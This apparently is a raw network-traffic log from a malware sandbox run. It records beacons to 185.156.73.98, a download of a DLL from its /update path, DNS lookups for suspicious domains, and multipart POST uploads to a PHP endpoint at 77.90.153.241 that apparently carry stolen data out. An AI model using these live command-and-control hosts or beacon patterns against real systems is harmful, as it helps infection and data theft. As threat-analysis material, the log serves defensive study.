Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:32:00 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:32:02 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:32:05 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/success?substr=mixthree&s=three&sub=none

Request

GET /success?substr=mixthree&s=three&sub=none HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:45 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/info

Request

GET /info HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:49 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 21
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/update

Request

GET /update HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: 1
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:49 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Disposition: attachment; filename="fuckingdllENCR.dll";
Content-Length: 99856
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: application/octet-stream
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:50 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:52 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:55 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:57 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:59 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:32:02 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:32:04 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:32:07 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:32:09 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:32:11 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET

http://185.156.73.98/service

Request

GET /service HTTP/1.1
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
User-Agent: C
Host: 185.156.73.98
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:32:13 GMT
Server: Apache/2.4.52 (Ubuntu)
Content-Length: 1
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

esccapewz.run

Request

esccapewz.run

IN A

Response
DNS

travewlio.shop

Request

travewlio.shop

IN A

Response
DNS

touvrlane.bet

Request

touvrlane.bet

IN A

Response
DNS

sighbtseeing.shop

Request

sighbtseeing.shop

IN A

Response
POST

http://77.90.153.241/612acd258782ade8.php

Request

POST /612acd258782ade8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GHDHDGHJEBGIDGDGIJJK
Host: 77.90.153.241
Content-Length: 1031
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:47 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
POST

http://77.90.153.241/612acd258782ade8.php

Request

POST /612acd258782ade8.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----DHJKJKKKJJJKJKFHJJJJ
Host: 77.90.153.241
Content-Length: 363
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 01:31:48 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 0
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
DNS

appliancerepair-virginiabeach.com

Request

appliancerepair-virginiabeach.com

IN A

Response

appliancerepair-virginiabeach.com

IN A

172.67.172.24

appliancerepair-virginiabeach.com

IN A

104.21.71.237
GET

http://appliancerepair-virginiabeach.com/

Request

GET http://appliancerepair-virginiabeach.com/ HTTP/1.1
Host: appliancerepair-virginiabeach.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
sentry-trace: 254da1e4974e43528f8f6e6daa2aa743-8035c9bd69d35f61
baggage: sentry-trace_id=254da1e4974e43528f8f6e6daa2aa743,sentry-environment=production,sentry-public_key=5706488cd6e163f68dfcc6e21d6709f6

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 29 Mar 2025 01:31:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Redirect-By: WordPress
Location: https://appliancerepair-virginiabeach.com/
X-FastCGI-Cache: HIT
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ql%2BifXFgpqKxtqTMU5j47B1XpwTXkhxJYFJTlU68jmgw%2FhZ8iq88O0hB32bbOq549N3yZ5%2BhX97KofiWx2A97SuKo65QpzP73b38iPUuX2cXK%2B39JfAZ0mf9S9ppcSXpfqZLEiNpCXlfYqehumIi2MMsYJE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b9c19e966ecfd-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=43066&min_rtt=43066&rtt_var=21533&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=492&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://appliancerepair-virginiabeach.com/

Request

GET http://appliancerepair-virginiabeach.com/ HTTP/1.1
Host: appliancerepair-virginiabeach.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
sentry-trace: 254da1e4974e43528f8f6e6daa2aa743-8035c9bd69d35f61
baggage: sentry-trace_id=254da1e4974e43528f8f6e6daa2aa743,sentry-environment=production,sentry-public_key=5706488cd6e163f68dfcc6e21d6709f6

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 29 Mar 2025 01:31:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Redirect-By: WordPress
Location: https://appliancerepair-virginiabeach.com/
X-FastCGI-Cache: HIT
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=m60i6EEby4haCpL3MlnxLZJ6hqxhAzr97wQdJMRrJtW9ziU5U%2FQnRlJy%2Bm8xiKIMK0vZwYpxFUUaQCpvgSs7QZJ4Ohj6B94AwvmCeyaU%2FT2%2F7DsnZMpuAW12RYzpcj6yDQDhyiv%2Fnt%2FAAbJvpitVd%2FbcnHw%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b9c29f9f5ecfd-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=50363&min_rtt=43066&rtt_var=30744&sent=3&recv=5&lost=0&retrans=0&sent_bytes=933&recv_bytes=984&delivery_rate=13376&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://appliancerepair-virginiabeach.com/

Request

GET http://appliancerepair-virginiabeach.com/ HTTP/1.1
Host: appliancerepair-virginiabeach.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
sentry-trace: 254da1e4974e43528f8f6e6daa2aa743-8035c9bd69d35f61
baggage: sentry-trace_id=254da1e4974e43528f8f6e6daa2aa743,sentry-environment=production,sentry-public_key=5706488cd6e163f68dfcc6e21d6709f6

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 29 Mar 2025 01:31:51 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Redirect-By: WordPress
Location: https://appliancerepair-virginiabeach.com/
X-FastCGI-Cache: HIT
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fo61jqXISt5afgs%2BSDxf1kos56JUAmAj21HiFJOogwNsCTcDx7tJduHTaVsO1I6E9ufM0NRUJUMzVN6cZlSsQiIOPOINmQlbF%2B%2BFIOmICTKavSRtBrEoAgB%2BNnxZiFQZSYKw3FKno3vrE15t6BrSkcJaeIE%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b9c305807ecfd-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=59717&min_rtt=43066&rtt_var=41766&sent=5&recv=7&lost=0&retrans=0&sent_bytes=1878&recv_bytes=1476&delivery_rate=13376&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://appliancerepair-virginiabeach.com/

Request

GET http://appliancerepair-virginiabeach.com/ HTTP/1.1
Host: appliancerepair-virginiabeach.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
sentry-trace: 254da1e4974e43528f8f6e6daa2aa743-8035c9bd69d35f61
baggage: sentry-trace_id=254da1e4974e43528f8f6e6daa2aa743,sentry-environment=production,sentry-public_key=5706488cd6e163f68dfcc6e21d6709f6

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 29 Mar 2025 01:31:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Redirect-By: WordPress
Location: https://appliancerepair-virginiabeach.com/
X-FastCGI-Cache: HIT
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YjHV4wEZM32eu8MIop0DNLzhJbOJL17TZcQNJNy1NNZQE88IWYTqpPUAtJj0XgJyKQU7PdsCUv7HEmzQx911FJtw4jJmyq6mog8pgCUM3xcXkaL6kVyx0SXkp7RMyOT2Eije66itWyLw%2Bm2dU4NWqNUkKa8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b9c367d8eecfd-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=66168&min_rtt=43066&rtt_var=44227&sent=7&recv=9&lost=0&retrans=0&sent_bytes=2819&recv_bytes=1968&delivery_rate=13376&cwnd=252&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://appliancerepair-virginiabeach.com/

Request

GET http://appliancerepair-virginiabeach.com/ HTTP/1.1
Host: appliancerepair-virginiabeach.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
sentry-trace: 254da1e4974e43528f8f6e6daa2aa743-8035c9bd69d35f61
baggage: sentry-trace_id=254da1e4974e43528f8f6e6daa2aa743,sentry-environment=production,sentry-public_key=5706488cd6e163f68dfcc6e21d6709f6

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 29 Mar 2025 01:31:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Redirect-By: WordPress
Location: https://appliancerepair-virginiabeach.com/
X-FastCGI-Cache: HIT
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mzFH3fiExE2YAll%2B%2BdyoHyXUmb5bqg8LAm5fNDEr%2BT%2FlUgbUKem7reIKzN9rEFrMXDJyLX0Oe2AlWxhffoIfnLwIokbfuHqDTPBWqQABUVXBgGNQY%2FL1saMRCn4NL0FFJZVVsHTMEYf5lCNIYL56YZUhnFM%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b9c3bcab0ecfd-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=86999&min_rtt=43066&rtt_var=74831&sent=9&recv=11&lost=0&retrans=0&sent_bytes=3754&recv_bytes=2460&delivery_rate=13376&cwnd=253&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://appliancerepair-virginiabeach.com/

Request

GET http://appliancerepair-virginiabeach.com/ HTTP/1.1
Host: appliancerepair-virginiabeach.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
sentry-trace: 254da1e4974e43528f8f6e6daa2aa743-8035c9bd69d35f61
baggage: sentry-trace_id=254da1e4974e43528f8f6e6daa2aa743,sentry-environment=production,sentry-public_key=5706488cd6e163f68dfcc6e21d6709f6

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 29 Mar 2025 01:31:54 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Redirect-By: WordPress
Location: https://appliancerepair-virginiabeach.com/
X-FastCGI-Cache: HIT
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eVrAE3evCUUofhqkYAGsqTkP3beZ8lbsGfYJbIWrcP18SirHuPhu3cFb87r049J4COgOuDzCgN%2FWh3AWxfmgMMrn1uR2UTQTqgj2BjRRUlXVe0lZV7OcliEL4%2BP%2BiqFgLgKm%2F6lwaASdgCDLksXNtajrkm8%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b9c40bf98ecfd-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=94383&min_rtt=43066&rtt_var=70893&sent=11&recv=13&lost=0&retrans=0&sent_bytes=4698&recv_bytes=2952&delivery_rate=13376&cwnd=254&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://appliancerepair-virginiabeach.com/

Request

GET http://appliancerepair-virginiabeach.com/ HTTP/1.1
Host: appliancerepair-virginiabeach.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
sentry-trace: 254da1e4974e43528f8f6e6daa2aa743-8035c9bd69d35f61
baggage: sentry-trace_id=254da1e4974e43528f8f6e6daa2aa743,sentry-environment=production,sentry-public_key=5706488cd6e163f68dfcc6e21d6709f6

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 29 Mar 2025 01:31:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Redirect-By: WordPress
Location: https://appliancerepair-virginiabeach.com/
X-FastCGI-Cache: HIT
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HnQa9W5MuiPHHUmSBNMbR7TH%2FhE5dMxSi13Lpn8xQw5tzQxlBdAvKIo3roKRJlc6XySsGR6kv9xs0eNllX8w6Vl%2FLCcsgNmL9tACB4K3kyvPpONzZWoOo2bCcScj9ZIJsbfwT7a3zXtpnwssEWNU4uxqqxY%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b9c457c4fecfd-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=94679&min_rtt=43066&rtt_var=53761&sent=13&recv=15&lost=0&retrans=0&sent_bytes=5641&recv_bytes=3444&delivery_rate=14026&cwnd=255&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://appliancerepair-virginiabeach.com/

Request

GET http://appliancerepair-virginiabeach.com/ HTTP/1.1
Host: appliancerepair-virginiabeach.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
sentry-trace: 254da1e4974e43528f8f6e6daa2aa743-8035c9bd69d35f61
baggage: sentry-trace_id=254da1e4974e43528f8f6e6daa2aa743,sentry-environment=production,sentry-public_key=5706488cd6e163f68dfcc6e21d6709f6

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 29 Mar 2025 01:31:55 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Redirect-By: WordPress
Location: https://appliancerepair-virginiabeach.com/
X-FastCGI-Cache: HIT
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NH7JTMHqofvgWJL13nK0MqfS0V5PAVCqkA5ecy0U%2FRI2hTOBAlCXOH5grvry9owl5IlnAt74600ztf%2FGmTEcVbeOOT54Djj4XXVxsw1Csb%2FeK1HE5rVBSVe%2BLQYKtkWsL%2BipocbbgTREPy9iSsSW2cUEJ3I%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b9c49d823ecfd-LHR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=97984&min_rtt=43066&rtt_var=46931&sent=15&recv=17&lost=0&retrans=0&sent_bytes=6580&recv_bytes=3936&delivery_rate=14026&cwnd=256&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
GET

http://appliancerepair-virginiabeach.com/

Request

GET http://appliancerepair-virginiabeach.com/ HTTP/1.1
Host: appliancerepair-virginiabeach.com
Accept: */*
Accept-Encoding: gzip, deflate
Connection: keep-alive
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
sentry-trace: 254da1e4974e43528f8f6e6daa2aa743-8035c9bd69d35f61
baggage: sentry-trace_id=254da1e4974e43528f8f6e6daa2aa743,sentry-environment=production,sentry-public_key=5706488cd6e163f68dfcc6e21d6709f6

Response

HTTP/1.1 301 Moved Permanently

Date: Sat, 29 Mar 2025 01:31:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Redirect-By: WordPress
Location: https://appliancerepair-virginiabeach.com/
X-FastCGI-Cache: HIT
cf-cache-status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oav%2Bq31mG1vqCmQ28FULuvjRwhpe%2FQWOMTAjpQ8q56znbAlXGTHtYMJnLka8gY0Tv6VgLNfcXF2zwXb0dI0v2WtE%2BZ1oWn%2B%2FAXQiNpAGqO3jQELOQwNdCKf5gb9de%2BTt1JMzA388Aosn8E1Yhlz9TaVgEKI%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 927b9c4ebcb3ecfd-LHR
alt-svc: h3=":443"; ma=86400
